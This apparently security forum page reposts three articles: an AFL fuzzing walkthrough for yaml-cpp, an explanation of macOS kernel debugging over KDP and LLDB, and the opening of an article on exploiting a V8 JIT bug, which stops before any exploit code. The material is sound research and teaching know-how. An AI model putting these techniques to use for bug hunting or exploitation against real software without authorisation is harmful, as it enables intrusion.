Jump to content

Nytro

Administrators
  • Posts

    18731
  • Joined

  • Last visited

  • Days Won

    709

Posts posted by Nytro

  1. Fuzzing workflows; a fuzz job from start to finish

     

    Many people have garnered an interest in fuzzing in the recent years, with easy-to-use frameworks like American Fuzzy Lop showing incredible promise and (relatively) low barrier to entry. Many websites on the internet give brief introductions to specific features of AFL, how to start fuzzing a given piece of software, but never what to do when you decide to stop fuzzing (or how you decide in the first place?).

    In this post, we’d like to go over a fuzz job from start to finish. What does this mean exactly? First, even finding a good piece of software to fuzz might seem daunting, but there is certain criteria that you can follow that can help you decide what would be useful and easy to get started with on fuzzing. Once we have the software, what’s the best way to fuzz it? What about which testcases we should use to seed with? How do we know how well we are doing or what code paths we might be missing in the target software?

    We hope to cover all of this to give a fully-colored, 360 view of how to effectively and efficiently go through a full fuzz job process from start to finish. For ease of use, we will focus on the AFL framework.

    What should I fuzz? Finding the right software

    AFL works best on C or C++ applications, so immediately this is a piece of criteria we should be looking for in software we would like to fuzz. There are a few questions we can ask ourselves when looking for software to fuzz.

    1. Is there example code readily available?
      • Chances are, any utilities shipped with the project are too heavy-weight and can be trimmed down for fuzzing purposes. If a project has bare-bones example code, this makes our lives as fuzzers much easier.
    2. Can I compile it myself? (Is the build system sane?)
      • AFL works best when you are able to build the software from source. It does support instrumenting black-box binaries on the fly with QEMU, but this is out of scope and tends to have poor performance. In my ideal scenario, I can easily build the software with afl-clang-fast or afl-clang-fast++.
    3. Are there easily available and unique testcases available?
      • We are probably going to be fuzzing a file format (although with some tuning, we can fuzz networked applications), and having some testcases to seed with that are unique and interesting will give us a good start. If the project has unit tests with test cases of files (or keeps files with previously known bugs for regression testing), this is a huge win as well.

     

    These basic questions will help save a lot of time and headaches later if you are just starting out.

     

    The yaml-cpp project

    Ok, but how do you find the software to ask these questions about? One favorite place is Github, as you can easily search for projects that have been recently updated and are written in C or C++. For instance, searching Github for all C++ projects with more than 200 stars led us to a project that shows a lot of promise: yaml-cpp (https://github.com/jbeder/yaml-cpp). Let’s take a look at it with our three questions and see how easily we can get this fuzzing.

    1. Can I compile it myself?
      • yaml-cpp uses cmake as its build system. This looks great as we can define which compilers we want to use, and there is a good chance afl-clang-fast++ will Just Work™. One interesting note in the README of yaml-cpp is that it builds a static library by default, which is perfect for us, as we want to give AFL a statically compiled and instrumented binary to fuzz.
    2. Is there example code readily available?
      • In the util folder in the root of the project (https://github.com/jbeder/yaml-cpp/tree/master/util), there are a few small cpp files, which are bare-bones utilities demonstrating certain features of the yaml-cpp library. Of particular interest is the parse.cpp file. This parse.cpp file is perfect as it is already written to accept data from stdin and we can easily adapt it to use AFL’s persistent mode, which will give us a significant speed increase.
    3. Are there easily available and unique/interesting testcases available?
      • In the test folder in the root of the project is a file called specexamples.h, which has a very good number of unique and interesting YAML testcases, each of which seems to be exercising a specific piece of code in the yaml-cpp library. Again, this is perfect for us as fuzzers to seed with.

     

    This looks like it will be easy to get started with. Let’s do it.

     

    Starting the fuzz job

    We are not going to cover installing or setting up AFL, as we will assume that has already been done. We are also assuming that afl-clang-fast and afl-clang-fast++ have been built and installed as well. While afl-g++ should work without issues (though you won’t get to use the awesome persistent mode), afl-clang-fast++ is certainly preferred. Let’s grab the yaml-cpp codebase and build it with AFL.

     

    # git clone https://github.com/jbeder/yaml-cpp.git
    # cd yaml-cpp
    # mkdir build
    # cd build
    # cmake -DCMAKE_CXX_COMPILER=afl-clang-fast++ ..
    # make

    Once we know that everything builds successfully, we can make a few changes to some of the source code so that AFL can get a bit more speed. From the root of the project, in /util/parse.cpp, we can update the main() function using an AFL trick for persistent mode.

     

    int main(int argc, char** argv) {
      Params p = ParseArgs(argc, argv);
    
      if (argc > 1) {
        std::ifstream fin;
        fin.open(argv[1]);
        parse(fin);
      } else {
        parse(std::cin);
      }
    
      return 0;
    }

     

    With this simple main() method, we can update the else clause of the if statement to include a while loop and a special AFL function called __AFL_LOOP(), which allows AFL to basically perform the fuzzing of the binary in process through some memory wizardry, as opposed to starting up a new process for every new testcase we want to test. Let’s see what that would look like.

     

    if (argc > 1) {
      std::ifstream fin;
      fin.open(argv[1]);
      parse(fin);
    } else {
      while (__AFL_LOOP(1000)) {
        parse(std::cin);
      }
    }

     

    Note the new while loop in the else clause, where we pass 1000 to the __AFL_LOOP() function. This tells AFL to fuzz up to 1000 testcases in process before spinning up a new process to do the same. By specifying a larger or smaller number, you may increase the number of executions at the expense of memory usage (or being at the mercy of memory leaks), and this can be highly tunable based on the application you are fuzzing. Adding this type of code to enable persistent mode also is not always this easy. Some applications may not have an architecture that supports easily adding a while loop due to resources spawned during start up or other factors.

    Let’s recompile now. Change back to the build directory in the yaml-cpp root, and type ‘make’ to rebuild parse.cpp.

     

    Testing the binary

    With the binary compiled, we can test it using a tool shipped with AFL called afl-showmap. The afl-showmap tool will run a given instrumented binary (passing any input received via stdin to the instrumented binary via stdin) and print a report of the feedback it sees during program execution.

     

    # afl-showmap -o /dev/null -- ~/parse < <(echo hi)
    afl-showmap 2.03b by <lcamtuf@google.com>
    [*] Executing '~/parse'...
    
    -- Program output begins --
    hi
    -- Program output ends --
    [+] Captured 1787 tuples in '/dev/null'.
    #

    By changing the input to something that should exercise new code paths, you should see the number of tuples reported at the end of the report grow or shrink.

     

    # afl-showmap -o /dev/null -- ~/parse < <(echo hi: blah)
    afl-showmap 2.03b by <lcamtuf@google.com>
    [*] Executing '~/parse'...
    
    -- Program output begins --
    hi: blah
    -- Program output ends --
    [+] Captured 2268 tuples in '/dev/null'.
    #

    As you can see, sending a simple YAML key (hi) expressed only 1787 tuples of feedback, but a YAML key with a value (hi: blah) expressed 2268 tuples of feedback. We should be good to go with the instrumented binary, now we need the testcases to seed our fuzzing with.

     

    Seeding with high quality test cases

    The testcases you initially seed your fuzzers with is one of, if not the, most significant aspect of whether you will see a fuzz run come up with some good crashes or not. As stated previously, the specexamples.h file in the yaml-cpp test directory has excellent test cases for us to start with, but they can be even better. For this job, I manually copied and pasted the examples from the header file into testcases to use, so to save the reader time, linked here are the original seed files I used, for reproduction purposes.

    AFL ships with two tools we can used to ensure that:

    • The files in the test corpus are as efficiently unique as possible
    • Each test file expresses its unique code paths as efficiently as possible

    The two tools, afl-cmin and afl-tmin, perform what is called minimizing. Without being too technical (this is a technical blog, right?), afl-cmin takes a given folder of potential test cases, then runs each one and compares the feedback it receives to all rest of the testcases to find the best testcases which most efficiently express the most unique code paths. The best testcases are saved to a new directory.

    The afl-tmin tool, on the other hand, works on only a specified file. When we are fuzzing, we don’t want to waste CPU cycles fiddling with bits and bytes that are useless relative to the code paths the testcase might express. In order to minimize each testcase to the bare minimum required to express the same code paths as the original testcase, afl-tmin iterates over the actual bytes in the testcases, removing progressively smaller and smaller chunks of data until it has a removed any bytes that don’t affect the code paths taken. It’s a bit much, but these are very important steps to efficiently fuzzing and they are important concepts to understand. Let’s see an example.

    In the git repo I created with the raw testcases from the specexamples.h file, we can start with the 2 file.

     

    # afl-tmin -i 2 -o 2.min -- ~/parse
    afl-tmin 2.03b by <lcamtuf@google.com>
    
    [+] Read 80 bytes from '2'.
    [*] Performing dry run (mem limit = 50 MB, timeout = 1000 ms)...
    [+] Program terminates normally, minimizing in instrumented mode.
    [*] Stage #0: One-time block normalization...
    [+] Block normalization complete, 36 bytes replaced.
    [*] --- Pass #1 ---
    [*] Stage #1: Removing blocks of data...
    Block length = 8, remaining size = 80
    Block length = 4, remaining size = 80
    Block length = 2, remaining size = 76
    Block length = 1, remaining size = 76
    [+] Block removal complete, 6 bytes deleted.
    [*] Stage #2: Minimizing symbols (22 code points)...
    [+] Symbol minimization finished, 17 symbols (21 bytes) replaced.
    [*] Stage #3: Character minimization...
    [+] Character minimization done, 2 bytes replaced.
    [*] --- Pass #2 ---
    [*] Stage #1: Removing blocks of data...
    Block length = 4, remaining size = 74
    Block length = 2, remaining size = 74
    Block length = 1, remaining size = 74
    [+] Block removal complete, 0 bytes deleted.
    
    File size reduced by : 7.50% (to 74 bytes)
    Characters simplified : 79.73%
    Number of execs done : 221
    Fruitless execs : path=189 crash=0 hang=0
    
    [*] Writing output to '2.min'...
    [+] We're done here. Have a nice day!
    
    # cat 2
    hr: 65 # Home runs
    avg: 0.278 # Batting average
    rbi: 147 # Runs Batted In
    # cat 2.min
    00: 00 #00000
    000: 00000 #0000000000000000
    000: 000 #000000000000000
    #

     

    This is a great example of how powerful AFL is. AFL has no idea what YAML is or what its syntax looks like, but it effectively was able to zero out all the characters that weren’t special YAML characters used to denote key value pairs. It was able to do this by determining that changing those specific characters would alter the feedback from the instrumented binary dramatically, and they should be left alone. It also removed four bytes from the original file that didn’t affect the code paths taken, so that is four less bytes we will be wasting CPU cycles on.

    In order to quickly minimize a starting test corpus, I usually use a quick for loop to minimize each one to a new file with a special file extension of .min.

     

    # for i in *; do afl-tmin -i $i -o $i.min -- ~/parse; done;
    # mkdir ~/testcases && cp *.min ~/testcases

     

    This for loop will iterate over each file in the current directory, and minimize it with afl-tmin to a new file with the same name as the first, just with a .min appended to it. This way, I can just cp *.min to the folder I will use to seed AFL with.

     

    Starting the fuzzers

    This is the section where most of the fuzzing walkthroughs end, but I assure you, this is only the beginning! Now that we have a high quality set of testcases to seed AFL with, we can get started. Optionally, we could also take advantage of the dictionary token functionality to seed AFL with the YAML special characters to add a bit more potency, but I will leave that as an exercise to the reader.

    AFL has two types of fuzzing strategies, one that is deterministic and one that is random and chaotic. When starting afl-fuzz instances, you can specify which type of strategy you would like that fuzz instance to follow. Generally speaking, you only need one deterministic (or master) fuzzer, but you can have as many random (or slave) fuzzers as your box can handle. If you have used AFL in the past and don’t know what this is talking about, you may have only run a single instance of afl-fuzz before. If no fuzzing strategy is specified, then the afl-fuzz instance will switch back and forth between each strategy.

     

    # screen afl-fuzz -i testcases/ -o syncdir/ -M fuzzer1 -- ./parse
    # screen afl-fuzz -i testcases/ -o syncdir/ -S fuzzer2 -- ./parse

     

    First, notice how we start each instance in a screen session. This allows us to connect and disconnect to a screen session running the fuzzer, so we don’t accidentally close the terminal running the afl-fuzz instance! Also note the arguments -M and -S used in each respective command. By passing -M fuzzer1 to afl-fuzz, I am telling it to be a Master fuzzer (use the deterministic strategy) and the name of the fuzz instance is fuzzer1. On the other hand, the -S fuzzer2 passed to the second command says to run the instance with a random, chaotic strategy and with a name of fuzzer2. Both of these fuzzers will work with each other, passing new test cases back and forth to each other as new code paths are found.

     

    When to stop and prune

    Once the fuzzers have run for a relatively extended period of time (I like to wait until the Master fuzzer has completed it’s first cycle at the very least, the Slave instances have usually completed many cycles by then), we shouldn’t just stop the job and start looking at the crashes. During fuzzing, AFL has hopefully created a huge corpus of new testcases that could still have bugs lurking in them. Instead of stopping and calling it a day, we should minimize this new corpus as much as possible, then reseed our fuzzers and let them run even more. This is the process that no walkthroughs talk about because it is boring, tedious, and can take a long time, but it is crucial to highly-effective fuzzing. Patience and hard work are virtues.

    Once the Master fuzzer for the yaml-cpp parse binary has completed it’s first cycle (it took about 10 hours for me, it might take 24 for an average workstation), we can go ahead and stop our afl-fuzz instances. We need to consolidate and minimize each instance’s queues and restart the fuzzing again. While running with multiple fuzzing instances, AFL will maintain a separate sync directory for each fuzzer inside of the root syncdir your specify as the argument to afl-fuzz. Each individual fuzzer syncdir contains a queue directory with all of the test cases that AFL was able to generate that lead to new code paths worth checking out.

    We need to consolidate each fuzz instance’s queue directory, as there will be a lot of overlap, then minimize this new body of test data.

     

    # cd ~/syncdir
    # ls
    fuzzer1 fuzzer2
    # mkdir queue_all
    # cp fuzzer*/queue/* queue_all/
    # afl-cmin -i queue_all/ -o queue_cmin -- ~/parse
    corpus minimization tool for afl-fuzz by <lcamtuf@google.com>
    
    [*] Testing the target binary...
    [+] OK, 884 tuples recorded.
    [*] Obtaining traces for input files in 'queue_all/'...
    Processing file 1159/1159... 
    [*] Sorting trace sets (this may take a while)...
    [+] Found 34373 unique tuples across 1159 files.
    [*] Finding best candidates for each tuple...
    Processing file 1159/1159... 
    [*] Sorting candidate list (be patient)...
    [*] Processing candidates and writing output files...
    Processing tuple 34373/34373... 
    [+] Narrowed down to 859 files, saved in 'queue_cmin'.

     

    Once we have run the generated queues through afl-cmin, we need to minimize each resulting file so that we don’t waste CPU cycles on bytes we don’t need. However, we have quite a few more files now than when we were just minimizing our starting testcases. A simple for loop for minimizing thousands of files could potentially take days and ain’t no one got time for that. Over time, I wrote a small bash script called afl-ptmin which parallelizes afl-tmin into a set number of processes and has proven to be a significant speed boost in minimizing.

     

    #!/bin/bash
    
    cores=$1
    inputdir=$2
    outputdir=$3
    pids=""
    total=`ls $inputdir | wc -l`
    
    for k in `seq 1 $cores $total`
    do
      for i in `seq 0 $(expr $cores - 1)`
      do
        file=`ls -Sr $inputdir | sed $(expr $i + $k)"q;d"`
        echo $file
        afl-tmin -i $inputdir/$file -o $outputdir/$file -- ~/parse &
      done
    
      wait
    done

     

    As with the afl-fuzz instances, I recommend still running this in a screen session so that no network hiccups or closed terminals cause you pain and anguish. It’s usage is simple, taking only three arguments, the number processes to start, the directory with the testcases to minimize, and the output directory to write the minimized test cases to.

     

    # screen ~/afl-ptmin 8 ./queue_cmin/ ./queue/

     

    Even with parallelization, this process can still take a while (24 hours+). For our corpus generated with yaml-cpp, it should be able to finish in an hour or so. Once done, we should remove the previous queue directories from the individual fuzzer syncdirs, then copy the queue/ folder to replace the old queue folder.

     

    # rm -rf fuzzer1/queue
    # rm -rf fuzzer2/queue
    # cp -r queue/ fuzzer1/queue
    # cp -r queue/ fuzzer2/queue

    With the new minimized queues in place, we can begin fuzzing back where we left off.

     

    # cd ~
    # screen afl-fuzz -i- -o syncdir/ -S fuzzer2 -- ./parse
    # screen afl-fuzz -i- -o syncdir/ -M fuzzer1 -- ./parse

     

    If you notice, instead of passing the -i argument a directory to read testcases from each time we call afl-fuzz, we simply pass a hyphen. This tells AFL to just use the queue/ directory in the syncdir for that fuzzer as the seed directory and start back up from there.

    This entire process starting the fuzz jobs, then stopping to minimize the queues and restarting the jobs can be done as many times as you feel it necessary (usually until you get bored or just stop finding new code paths). It should also be done often because otherwise you are wasting your electricity bill on bytes that aren’t going to pay you anything back later.

     

    Triaging your crashes

    Another traditionally tedious part of the fuzzing lifecycle has been triaging your findings. Luckily, some great tools have been written to help us with this.

    A great tool is crashwalk, by @rantyben (props!). It automates gdb and a special gdb plugin to quickly determine which crashes may lead to exploitable conditions or not. This isn’t fool proof by any means, but does give you a bit of a head start in which crashes to focus on first. Installing it is relatively straight-forward, but we need a few dependencies first.

     

    # apt-get install gdb golang
    # mkdir src
    # cd src
    # git clone https://github.com/jfoote/exploitable.git
    # cd && mkdir go
    # export GOPATH=~/go
    # go get -u github.com/bnagy/crashwalk/cmd/…

    With crashwalk installed in ~/go/bin/, we can automatically analyze the files and see if they might lead to exploitable bugs.

     

    # ~/go/bin/cwtriage -root syncdir/fuzzer1/crashes/ -match id -- ~/parse @@

     

    Determining your effectiveness and code coverage

    Finding crashes is great fun and all, but without being able to quantify how well you are exercising the available code paths in the binary, you are doing nothing but taking shots in the dark and hoping for a good result. By determining which parts of the code base you aren’t reaching, you can better tune your testcase seeds to hit the code you haven’t been able to yet.

    An excellent tool (developed by @michaelrash) called afl-cov can help you solve this exact problem by watching your fuzz directories as you find new paths and immediately running the testcase to find any new coverage of the codebase you may have hit. It accomplishes this using lcov, so we must actually recompile our parse binary with some special options before continuing.

     

    # cd ~/yaml-cpp/build/
    # rm -rf ./*
    # cmake -DCMAKE_CXX_FLAGS="-O0 -fprofile-arcs -ftest-coverage" \
    -DCMAKE_EXE_LINKER_FLAGS="-fprofile-arcs -ftest-coverage" ..
    # make
    # cp util/parse ~/parse_cov

     

    With this new parse binary, afl-cov can link what code paths are taken in the binary with a given input with the code base on the file system.

     

    # screen afl-cov/afl-cov -d ~/syncdir/ --live --coverage-cmd "~/parse_cov AFL_FILE" --code-dir ~/yaml-cpp/ 

     

    Once finished, afl-cov generates report information in the root syncdir in a directory called cov. This includes HTML files that are easily viewed in a web browser detailing which functions and lines of code were hit, as well as with functions and lines of code were not hit.

     

    In the end

    In the three days it took to flesh this out, I found no potentially exploitable bugs in yaml-cpp. Does that mean that no bugs exist and it’s not worth fuzzing? Of course not. In our industry, I don’t believe we publish enough about our failures in bug hunting. Many people may not want to admit that they put a considerable amount of effort and time into something that came up as what others might consider fruitless. In the spirit of openness, linked below are all of the generated corpus (fully minimized), seeds, and code coverage results (~70% code coverage) so that someone else can take them and determine whether or not it’s worthy to pursue the fuzzing.

     

    https://github.com/bperryntt/yaml-fuzz

     

    Sursa: https://foxglovesecurity.com/2016/03/15/fuzzing-workflows-a-fuzz-job-from-start-to-finish/

  2. An overview of macOS kernel debugging

    Date Tue 07 May 2019 By Francesco Cagnin Category macOS. Tags macOS XNU kernel debugging

    This is the first of two blog posts about macOS kernel debugging. Here, we introduce what kernel debugging is, explain how it is implemented for the macOS kernel and discuss the limitations that come with it; in the second post, we will present our solution for a better macOS debugging experience.

    The terms macOS kernel, Darwin kernel and XNU are used interchangeably throughout the posts. References are provided for XNU 4903.221.2 from macOS 10.14.1, the latest available sources at the time of writing.

    What is a kernel debugger?

    Debugging is the process of searching and correcting software issues that may cause a program to misbehave. Faults include wrong results, program freezes or crashes, and sometimes even security vulnerabilities. To examine running applications, operating systems provide userland debuggers mechanisms like ptrace or exception ports; but when working at kernel/driver/OS level, more powerful capabilities are required.

    Modern operating systems like macOS or iOS consist of millions of lines of code, through which the kernel orchestrates the execution of hundreds of threads manipulating thousands of critical data structures. This complexity facilitates the introduction of likewise complex programming errors, which at minimum can cause the machine to stop or reboot. Even when kernel sources are available, tracing the root causes of such bugs is often very difficult, especially without knowing exactly which code has been executed or the state of registers and memory; similarly, the analysis of kernel rootkits and exploits of security vulnerabilities requires an accurate study of the behaviour of the machine.

    For these reasons, operating systems often implement a kernel debugger, usually composed of a simple agent running inside the kernel, which receives and executes debugging commands, and a complete debugger running on a remote machine, which sends commands to the kernel and displays the results. The debugging stub internal to the kernel generally has the tasks of:

    • reading and writing registers;
    • reading and writing memory;
    • single-stepping through the code;
    • catching CPU interrupts.

    With these capabilities, it also becomes possible to:

    • pause the kernel execution at specific virtual addresses, by patching the code with INT3 instructions and then waiting for type-3 interrupts to occur;
    • introspect kernel structures by parsing the kernel header and reading memory.

    The next sections describe in detail how kernel debugging is implemented by XNU.

    Debugging the macOS kernel

    As described in the kernel’s README, XNU supports remote (two-machine) debugging by implementing the Kernel Debugging Protocol (KDP). Apple’s documentation about the topic is outdated and no longer being updated, but luckily detailed guides [1][2][3] on how to set up recent macOS kernels for remote debugging are available on the Internet; summarising, it is required to switch to one of the debug builds of the kernel (released as part of the Kernel Debug Kit, or KDK), rebuild the kernel extension (kext) caches and set the debug boot-arg in the NVRAM to the appropriate values. After this, LLDB (or any other debugger supporting KDP) can attach to the kernel. Conveniently, it is also possible to debug a virtual machine instead of a second Mac [4][5][6].

    Mentioned for completeness, at least two other methods for kernel debugging have been supported at some point for several XNU releases. The archived Apple’s docs suggest to use ddb over a serial line when debugging via KDP is not possible or problematic (e.g., before the network hardware is initialised), but support for this feature seems to have been dropped after XNU 1699.26.8 as all related files were removed in the next release. Other documents, like the README of the kernel debug kit for macOS 10.7.3 build 11D50, allude to the possibility of using /dev/kmem for limited self-debugging:

    ‘Live (single-machine) kernel debugging was introduced in Mac OS X Leopard. This allows limited introspection of the kernel on a currently-running system. This works using the normal kernel and the symbols in this Kernel Debug Kit by specifying kmem=1 in your boot-args; the DEBUG kernel is not required.’

    This method still works in recent macOS builds provided that System Integrity Protection (SIP) is disabled [7][8], but newer KDKs do not mention it anymore, and a note from the archived Apple’s docs says that support for /dev/kmem will be removed entirely in the future.

    The Kernel Debugging Protocol

    As already introduced, to make remote debugging possible XNU implements the Kernel Debugging Protocol, a client–server protocol over UDP that allows a debugger to send commands to the kernel and receive back results and exceptions notifications. The current revision of the protocol is the 12th, around since macOS 10.6 and XNU 1456.1.26.

    Like in typical communication protocols, KDP packets are composed of a common header (containing, among others: the request type; a flag for distinguishing between requests and replies; and a sequence number) and specialised bodies for the different types of requests, like KDP_READMEM64 and KDP_WRITEMEM64, KDP_READREGS and KDP_WRITEREGS, KDP_BREAKPOINT_SET and KDP_BREAKPOINT_REMOVE. As stated in most debug kits’ README, communications between the kernel and the external debugger may occur either via FireWire or Ethernet (with Thunderbolt adapters in case no such ports are available); Wi-Fi is not supported. The kernel listens for KDP connections only when:

    • it is a DEVELOPMENT or DEBUG build and the debug boot-arg has been set to DB_HALT, in which case the kernel stops after the initial startup waiting for a debugger to attach [9][10];
    • it is being run on a hypervisor, the debug boot-arg has been set to DB_NMI and a non-maskable interrupt (NMI) is triggered [11][12];
    • the debug boot-arg has been set to any value (even invalid ones) and a panic occurs [13][14].

    As might be expected, XNU assumes at most one KDP client is attached to it at any given time. With an initial KDP_CONNECT request, the debugger informs the kernel on which UDP port should notifications be sent back when exceptions occur. The interested reader can have an in depth look at the full KDP implementation starting from osfmk/kdp/kdp_protocol.h and osfmk/kdp/kdp_udp.c.

    Detailed account of kernel-debugger interactions over KDP

    For the even more curious, this section documents thoroughly what happens when LLDB attaches to XNU via KDP; reading is not required to follow the rest of the post. References are provided for LLDB 8.0.0.

    Assuming that the kernel has been properly set up for debugging and the debug boot-arg has been set to DB_HALT, at some point during the XNU startup an IOKernelDebugger object will call kdp_register_send_receive() [15]. This routine, after parsing the debug boot-arg, executes kdp_call() [16][17] to generate an EXC_BREAKPOINT trap [18], which in turn triggers the execution of trap_from_kernel() [19], kernel_trap() [20] and kdp_i386_trap() [21][22][23]. This last function calls handle_debugger_trap() [24][25] and eventually kdp_raise_exception() [26][27] to start kdp_debugger_loop() [28][29]. Since no debugger is connected (yet), the kernel stops at kdp_connection_wait() [30][31], printing the string ‘Waiting for remote debugger connection.[32] and then waiting to receive a KDP_REATTACH request followed by a KDP_CONNECT [33].

    In LLDB, the kdp-remote plug-in handles the logic for connecting to a remote KDP server. When the kdp-remote command is executed by the user, LLDB initiates the connection to the specified target by executing ProcessKDP::DoConnectRemote() [34], which sends in sequence the two initial requests KDP_REATTACH [35][36] and KDP_CONNECT [37][38].

    Upon receiving the two requests, kdp_connection_wait() terminates [39][40] and kdp_handler() is entered [41][42]. Here, requests from the client are received [43], processed using a dispatch table [44][45] and responded [46] in a loop until either a KDP_RESUMECPUS or a KDP_DISCONNECT request is received [47][48].

    Completed the initial handshake, LLDB then sends three more requests (KDP_VERSION [49][50], KDP_HOSTINFO [51][52] and KDP_KERNELVERSION [53][54]) to extract information about the debuggee. If the kernel version string (an example is ‘Darwin Kernel Version 16.0.0: Mon Aug 29 17:56:21 PDT 2016; root:xnu-3789.1.32~3/DEVELOPMENT_X86_64; UUID=3EC0A137-B163-3D46-A23B-BCC07B747D72; stext=0xffffff800e000000’) is recognised as coming from a Darwin kernel [55][56], then the darwin-kernel dynamic loader plug-in is loaded. At this point, the connection to the remote target is established and the attach phase is completed [57][58] by eventually instanciating the said plug-in [59][60], which tries to locate the kernel load address [61][62] and the kernel image [63][64]. Finally, the Darwin kernel module is loaded [65][66][67][68], which first searches the local file system for an on-disk file copy of the kernel using its UUID [69][70] and then eventually loads all kernel extensions [71][72].

    After attaching, LLDB waits for commands from the user, which will be translated into KDP requests and sent to the kernel:

    • commands register read and register write generate KDP_READREGS [73] and KDP_WRITEREGS [74] requests;
    • commands memory read and memory write generate KDP_READMEM [75] and KDP_WRITEMEM [76] requests (respectively KDP_READMEM64 and KDP_WRITEMEM64 for 64-bit targets);
    • commands breakpoint set and breakpoint delete generate KDP_BREAKPOINT_SET and KDP_BREAKPOINT_REMOVE [77] requests (respectively KDP_BREAKPOINT_SET64 and KDP_BREAKPOINT_REMOVE64 for 64-bit targets);
    • commands continue and step both generate KDP_RESUMECPUS [78] requests; in case of single-stepping, the TRACE bit of the RFLAGS register is set [79][80][81] with a KDP_WRITEREGS request before resuming, which later causes a type-1 interrupt to be raised by the CPU after the next instruction is executed.

    Upon receiving a KDP_RESUMECPUS request, kdp_handler() and kdp_debugger_loop() terminate [82][83][84] and the machine resumes its execution. When the CPU hits a breakpoint a trap is generated, and starting from trap_from_kernel() a new call to kdp_debugger_loop() is made (as discussed above). Since this time the debugger is connected, a KDP_EXCEPTION notification is generated [85][86] to inform the debugger about the event. After this, kdp_handler() [87] is executed again and the kernel is ready to receive new commands.

    The Kernel Debug Kit

    For some macOS releases, Apple also publishes the related Kernel Debug Kits, containing:

    • the RELEASE, KASAN (only occasionally), DEVELOPMENT and DEBUG builds of the kernel, the last two compiled with ‘additional assertions and error checking’;
    • symbols and debugging information in DWARF format, for each of the kernel builds and some Apple kexts included in macOS;
    • the lldbmacros, a set of additional LLDB commands for Darwin kernels.

    KDKs are incredibly valuable for kernel debugging, but unfortunately they are not made available for all XNU builds and are often published weeks or months after them. By searching the Apple Developer Portal for the non-beta builds of macOS 10.14 as an example, at the time of writing the article, the KDKs released on the same day as the respective macOS release are only three (18A391, 18C54 and 18E226) out of nine builds; one KDK was released two weeks late (18B75); and no KDK was released for the other five builds (18B2107, 18B3094, 18D42, 18D43, 18D109). From a post on the Apple Developer Forums it appears that nowadays ‘the correct way to request a new KDK is to file a bug asking for it.’

    lldbmacros

    Starting with Apple’s adoption of LLVM with Xcode 3.2, GDB was eventually replaced by LLDB as the debugger of choice for macOS and its kernel. Analogously to the old kgmacros for GDB, Apple has been releasing since at least macOS 10.8 and XNU 2050.7.9 the so-called lldbmacros, a set of Python scripts for extending LLDB’s capabilities with helpful commands and macros for kernel debugging. Examples of these commands are allproc (for printing procinfo for each process structure), pmap_walk (to perform a page-table walk for virtual addresses) and showallkmods (for a summary of all loaded kexts).

    Limitations of the available tools

    The combination of KDP and LLDB, alongside with the notable introspection possibilities offered by lldbmacros, make for a great kernel debugger; still, at present time this approach also has a few annoyances and drawbacks, here summarised.

    First, as already noted, the KDP stub in the kernel is activated only after setting the debug boot-arg in the non-volatile RAM, but such operation requires to disable SIP. Secondly, the whole debugging procedure has many side effects: the modification of global variables (like kdp_flag); the value of the kernel base address written at a fixed memory location; the altering of kernel code with 0xCC software breakpoints [88][89] (watchpoints are not supported). All these (and others) can be easily detected by drivers, rootkits and exploits by reading NVRAM or global variables or with code checksums. Thirdly, the remote debugger cannot stop the execution of the kernel once it has been resumed: the only way to return to the debugger is to wait for breakpoints to occur (or to generate traps by, for example, injecting an NMI with dtrace from inside the debuggee). Fourthly, debugging can obviously start only after the initialisation of the KDP agent in the kernel, which happens relatively late in the startup phase and makes early debugging impossible. Finally, being part of the Kernel Debug Kits, lldbmacros are unfortunately only available for a few macOS releases.

    Wrapping up

    With this post, we tried to document accurately how macOS kernel debugging works, in the hope of creating an up-to-date reference on the topic. In the next post, we will present our solution for a better macOS debugging experience, also intended to overcome the limitations of the current approach.

     

    Sursa: https://blog.quarkslab.com/an-overview-of-macos-kernel-debugging.html

  3. Title : Exploiting Logic Bugs in JavaScript JIT Engines
    Author : saelo
    Date : May 7, 2019
    |=-----------------------------------------------------------------------=|
    |=---------------=[       The Art of Exploitation       ]=---------------=|
    |=-----------------------------------------------------------------------=|
    |=----------------=[ Compile Your Own Type Confusions ]=-----------------=|
    |=---------=[ Exploiting Logic Bugs in JavaScript JIT Engines ]=---------=|
    |=-----------------------------------------------------------------------=|
    |=----------------------------=[ saelo ]=--------------------------------=|
    |=-----------------------=[ phrack@saelo.net ]=--------------------------=|
    |=-----------------------------------------------------------------------=|
    
    
    --[ Table of contents
    
    0 - Introduction
    1 - V8 Overview
        1.1 - Values
        1.2 - Maps
        1.3 - Object Summary
    2 - An Introduction to Just-in-Time Compilation for JavaScript
        2.1 - Speculative Just-in-Time Compilation
        2.2 - Speculation Guards
        2.3 - Turbofan
        2.4 - Compiler Pipeline
        2.5 - A JIT Compilation Example
    3 - JIT Compiler Vulnerabilities
        3.1 - Redundancy Elimination
        3.2 - CVE-2018-17463
    4 - Exploitation
        4.1 - Constructing Type Confusions
        4.2 - Gaining Memory Read/Write
        4.3 - Reflections
        4.4 - Gaining Code Execution
    5 - References
    6 - Exploit Code
    
    
    --[ 0 - Introduction
    
    This article strives to give an introduction into just-in-time (JIT)
    compiler vulnerabilities at the example of CVE-2018-17463, a bug found
    through source code review and used as part of the hack2win [1] competition
    in September 2018. The vulnerability was afterwards patched by Google with
    commit 52a9e67a477bdb67ca893c25c145ef5191976220 "[turbofan] Fix
    ObjectCreate's side effect annotation" and the fix was made available to
    the public on October 16th with the release of Chrome 70.
    
    Source code snippets in this article can also be viewed online in the
    source code repositories as well as on code search [2]. The exploit was
    tested on chrome version 69.0.3497.81 (64-bit), corresponding to v8 version
    6.9.427.19.
    
    
    --[ 1 - V8 Overview
    
    V8 is Google's open source JavaScript engine and is used to power amongst
    others Chromium-based web browsers. It is written in C++ and commonly used
    to execute untrusted JavaScript code. As such it is an interesting piece of
    software for attackers.
    
    V8 features numerous pieces of documentation, both in the source code and
    online [3]. Furthermore, v8 has multiple features that facilitate the
    exploring of its inner workings:
    
        0. A number of builtin functions usable from JavaScript, enabled
        through the --enable-natives-syntax flag for d8 (v8's JavaScript
        shell). These e.g. allow the user to inspect an object via
        %DebugPrint, to trigger garbage collection with %CollectGarbage, or to
        force JIT compilation of a function through %OptimizeFunctionOnNextCall.
    
        1. Various tracing modes, also enabled through command-line flags, which
        cause logging of numerous engine internal events to stdout or a log
        file. With these, it becomes possible to e.g. trace the behavior of
        different optimization passes in the JIT compiler.
    
        2. Miscellaneous tools in the tools/ subdirectory such as a visualizer
        of the JIT IR called turbolizer.
    
    --[ 1.1 - Values
    
    As JavaScript is a dynamically typed language, the engine must store type
    information with every runtime value. In v8, this is accomplished through a
    combination of pointer tagging and the use of dedicated type information
    objects, called Maps.
    
